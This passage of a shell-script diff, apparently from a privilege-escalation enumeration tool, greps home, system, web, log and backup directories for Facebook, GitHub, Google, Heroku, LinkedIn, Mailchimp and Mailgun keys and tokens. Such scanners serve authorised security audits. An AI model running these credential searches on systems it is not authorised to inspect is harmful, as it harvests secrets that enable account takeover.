+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Facebook Secret Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Github (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Google API Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Google Cloud Platform API Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Google Drive Oauth (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Google Oauth Access Token (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Heroku API Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching LinkedIn Client ID (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching LinkedIn Secret Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Mailchamp API Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Mailgun API Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
